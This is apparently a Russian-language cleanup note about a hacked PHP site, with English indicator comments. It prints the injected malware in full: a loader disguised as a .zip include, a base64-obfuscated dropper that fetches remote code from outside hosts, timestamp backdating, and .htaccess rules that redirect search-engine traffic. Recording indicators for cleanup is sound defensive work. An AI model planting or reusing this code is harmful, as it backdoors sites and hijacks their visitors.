hri.zip
4bb0a250f62548654e50c3d29c4b6096.zip
d730d81e7o133a51c2bddc5c68874ce.zip
bor.zip
xm1rpc.php
Разновидности: w84881249n.php
В начало index.php дописывает:
<?php // Injected loader (IoC): a line of this shape at the top of index.php is not part of a legitimate site.
// Error reporting and display are switched off, so a failing include leaves no visible trace on the page.
error_reporting(0);ini_set("display_errors", 0);
// Site root = everything in SCRIPT_FILENAME before the first occurrence of SCRIPT_NAME.
$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
// include_once runs the target as PHP whatever its extension says, so the ".zip" name only disguises a script.
// During cleanup treat that file as a payload to be removed and analysed, not as an archive.
include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>
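В конец index.php дописывает (этот код заново создаёт xm1rpc.php, если файла нет, он меньше 3000 байт или старше часа, дописывает правила в .htaccess и выставляет .htaccess и его папке случайное время изменения в прошлом, поэтому датам изменения этих файлов доверять нельзя):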
<?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106ICcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVU
VTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChpc19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4=')); } $htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = $root_path . 
'/.htaccess'; chmod(dirname($htaccess_path) , 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess . "\n" . 
$htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); } function ___bdec($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; }
В .htaccess добавляет:
# Injected rule block (IoC): the dropper code shown earlier on this page writes this same text at the top of .htaccess.
<IfModule mod_rewrite.c>
RewriteEngine On
# Either condition is enough ([OR]): the User-Agent or the Referer contains one of the listed search-engine names.
# There is no [NC] flag, so the match is case-sensitive as written.
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
# Every matching request, whatever its path, is rewritten to index.php; requests matching neither condition are not touched by this block.
# Direct visits therefore look normal, so verify a cleanup with a search-engine User-Agent or Referer as well.
RewriteRule ^.*$ index.php [L]
</IfModule>
И это ещё не всё: в папках очень много мусора.
Редирект идёт на сайт http:// ineed2fuck.com